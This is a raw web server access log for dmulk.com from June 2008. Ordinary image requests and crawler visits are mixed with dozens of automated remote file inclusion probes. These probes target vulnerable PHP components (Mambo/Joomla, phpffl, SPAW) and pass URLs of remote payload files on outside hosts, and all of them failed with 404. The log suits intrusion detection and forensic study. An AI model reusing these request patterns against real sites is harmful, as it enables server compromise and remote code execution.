203.130.242.48 - - [09/Jun/2008:11:17:11 -0700] "GET /plugins/payment/verotel/verotel.inc.php?config[Broot_dir]http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.67.79 - - [09/Jun/2008:11:17:14 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0012.jpg HTTP/1.1" 200 11762 "-" "Googlebot-Image/1.0" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:17:19 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0099.jpg HTTP/1.1" 200 539566 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
203.130.242.48 - - [09/Jun/2008:11:17:30 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:17:32 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0050.jpg HTTP/1.1" 200 452686 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
66.230.197.170 - - [09/Jun/2008:11:17:42 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:17:46 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0108.jpg HTTP/1.1" 200 370655 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
203.130.242.48 - - [09/Jun/2008:11:17:57 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:17:59 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0117.jpg HTTP/1.1" 200 372417 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
72.47.201.117 - - [09/Jun/2008:11:18:05 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.geocities.com/vianarina/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
72.47.201.117 - - [09/Jun/2008:11:18:05 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.geocities.com/vianarina/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
207.218.234.146 - - [09/Jun/2008:11:18:08 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [09/Jun/2008:11:18:08 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:18:13 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0083.jpg HTTP/1.1" 200 378221 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
211.224.129.124 - - [09/Jun/2008:11:18:24 -0700] "GET /logs/access_080111.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:18:26 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0065.jpg HTTP/1.1" 200 309498 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
208.71.170.173 - - [09/Jun/2008:11:18:26 -0700] "GET /logs/access_080331.log/page.php?doc=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.4.3 - - [09/Jun/2008:11:18:29 -0700] "GET //MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.38.4.3 - - [09/Jun/2008:11:18:29 -0700] "GET /logs/access_080129.log//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.38.4.3 - - [09/Jun/2008:11:18:29 -0700] "GET /logs/access_080103.log//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.38.4.3 - - [09/Jun/2008:11:18:29 -0700] "GET /logs//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:11:18:35 -0700] "GET /logs/access.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:11:18:35 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:11:18:36 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.7.193.199 - - [09/Jun/2008:11:18:40 -0700] "GET /logs/access_071219.log//admin/spaw/spaw_control.class.php?spaw_root=http://it.geocities.com/djr0x32/bsid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:18:40 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0035.jpg HTTP/1.1" 200 391510 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
66.7.193.199 - - [09/Jun/2008:11:18:45 -0700] "GET /logs/access_071212.log//admin/spaw/spaw_control.class.php?spaw_root=http://it.geocities.com/djr0x32/bsid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:11:18:48 -0700] "GET /logs/access_080106.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.54.9.218 - - [09/Jun/2008:11:18:53 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://rehab.ru/images/stories/dop3-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:18:53 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0058.jpg HTTP/1.1" 200 409366 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
195.54.9.218 - - [09/Jun/2008:11:18:53 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://rehab.ru/images/stories/dop3-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
132.248.5.4 - - [09/Jun/2008:11:19:00 -0700] "GET /logs//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
132.248.5.4 - - [09/Jun/2008:11:19:01 -0700] "GET //administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.213.30 - - [09/Jun/2008:11:19:01 -0700] "GET /minamijewelry/html/moon.html HTTP/1.0" 200 20920 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.30 - - [09/Jun/2008:11:19:03 -0700] "GET /minamijewelry/html/custom.html HTTP/1.0" 200 12704 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
132.248.5.4 - - [09/Jun/2008:11:19:03 -0700] "GET /logs//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
132.248.5.4 - - [09/Jun/2008:11:19:03 -0700] "GET //administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:19:07 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0014.jpg HTTP/1.1" 200 376404 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
89.104.78.250 - - [09/Jun/2008:11:19:09 -0700] "GET /logs/access.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:11:19:09 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:11:19:10 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
132.248.5.4 - - [09/Jun/2008:11:19:11 -0700] "GET /logs//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
132.248.5.4 - - [09/Jun/2008:11:19:11 -0700] "GET //administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.47.60.169 - - [09/Jun/2008:11:19:14 -0700] "GET //errors.php?error=http://www.geocities.com/vianarina/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
132.248.5.4 - - [09/Jun/2008:11:19:17 -0700] "GET /logs//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
132.248.5.4 - - [09/Jun/2008:11:19:17 -0700] "GET //administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:19:20 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0024.jpg HTTP/1.1" 200 313646 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
89.104.78.250 - - [09/Jun/2008:11:19:22 -0700] "GET /logs/access_080106.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.216.2.12 - - [09/Jun/2008:11:19:29 -0700] "GET /logs//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.tripiwarez.eu/script/blid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.2.12 - - [09/Jun/2008:11:19:29 -0700] "GET //MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.tripiwarez.eu/script/blid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:19:34 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0069.jpg HTTP/1.1" 200 376553 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
66.230.197.245 - - [09/Jun/2008:11:19:36 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [09/Jun/2008:11:19:36 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.54.9.218 - - [09/Jun/2008:11:19:41 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://rehab.ru/images/stories/dop3-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.54.9.218 - - [09/Jun/2008:11:19:42 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://rehab.ru/images/stories/dop3-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
132.248.5.4 - - [09/Jun/2008:11:19:43 -0700] "GET /logs//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
132.248.5.4 - - [09/Jun/2008:11:19:43 -0700] "GET //administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:19:48 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0039.jpg HTTP/1.1" 200 531041 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
74.53.196.178 - - [09/Jun/2008:11:19:49 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://o-x-r-a-n-a.ru/forum/language/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
74.53.196.178 - - [09/Jun/2008:11:19:49 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://o-x-r-a-n-a.ru/forum/language/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
74.53.240.146 - - [09/Jun/2008:11:19:58 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://powderpuffsquad.com//images/press/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
74.53.240.146 - - [09/Jun/2008:11:19:58 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://powderpuffsquad.com//images/press/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:20:01 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0132.jpg HTTP/1.1" 200 286102 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:20:15 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0045.jpg HTTP/1.1" 200 438895 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
218.149.85.18 - - [09/Jun/2008:11:20:20 -0700] "GET /logs/access_080513.log/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.149.85.18 - - [09/Jun/2008:11:20:20 -0700] "GET /administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.149.85.18 - - [09/Jun/2008:11:20:21 -0700] "GET /logs/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.149.85.18 - - [09/Jun/2008:11:20:23 -0700] "GET /logs/access_080513.log/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.149.85.18 - - [09/Jun/2008:11:20:23 -0700] "GET /administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.149.85.18 - - [09/Jun/2008:11:20:24 -0700] "GET /logs/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:20:28 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0041.jpg HTTP/1.1" 200 416115 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
66.249.67.79 - - [09/Jun/2008:11:20:40 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0033.jpg HTTP/1.1" 200 368875 "-" "Googlebot-Image/1.0" "dmulk.com"
211.189.26.170 - - [09/Jun/2008:11:20:42 -0700] "GET /logs/access_080103.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:20:42 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0056.jpg HTTP/1.1" 200 339046 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
74.52.238.34 - - [09/Jun/2008:11:20:44 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.238.34 - - [09/Jun/2008:11:20:44 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:11:20:49 -0700] "GET /logs/access.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:20:56 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0080.jpg HTTP/1.1" 200 410742 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
203.130.242.48 - - [09/Jun/2008:11:21:08 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [09/Jun/2008:11:21:08 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:21:09 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0075.jpg HTTP/1.1" 200 372101 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:21:23 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0038.jpg HTTP/1.1" 200 500121 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
207.218.234.146 - - [09/Jun/2008:11:21:25 -0700] "GET /logs/access_080312.log//admin/addons/archive/archive.php?adminfolder=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [09/Jun/2008:11:21:25 -0700] "GET //admin/addons/archive/archive.php?adminfolder=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [09/Jun/2008:11:21:25 -0700] "GET /logs//admin/addons/archive/archive.php?adminfolder=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
132.248.5.4 - - [09/Jun/2008:11:21:36 -0700] "GET /logs//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
132.248.5.4 - - [09/Jun/2008:11:21:36 -0700] "GET //administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:21:37 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0068.jpg HTTP/1.1" 200 386583 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:21:50 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0040.jpg HTTP/1.1" 200 379587 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
89.104.78.250 - - [09/Jun/2008:11:21:56 -0700] "GET /logs/homepage.php?sel=http://boos.freetzi.com/inject/boos? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:11:21:57 -0700] "GET /homepage.php?sel=http://boos.freetzi.com/inject/boos? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:22:03 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0061.jpg HTTP/1.1" 200 318994 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
66.230.197.170 - - [09/Jun/2008:11:22:11 -0700] "GET /logs/access_080312.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:22:17 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0114.jpg HTTP/1.1" 200 311673 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
211.189.26.170 - - [09/Jun/2008:11:22:24 -0700] "GET /logs/access.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:11:22:24 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:11:22:25 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:22:30 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0074.jpg HTTP/1.1" 200 466874 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
207.218.234.146 - - [09/Jun/2008:11:22:33 -0700] "GET /logs/access_080228.log//admin/addons/archive/archive.php?adminfolder=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:22:44 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0105.jpg HTTP/1.1" 200 405751 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
211.189.26.170 - - [09/Jun/2008:11:22:56 -0700] "GET /logs/access_080312.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:22:57 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0018.jpg HTTP/1.1" 200 320247 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:23:11 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0063.jpg HTTP/1.1" 200 443016 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
80.154.38.121 - - [09/Jun/2008:11:23:13 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://mfe-gay.de/cek.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [09/Jun/2008:11:23:15 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.230.197.170 - - [09/Jun/2008:11:23:17 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.170 - - [09/Jun/2008:11:23:17 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
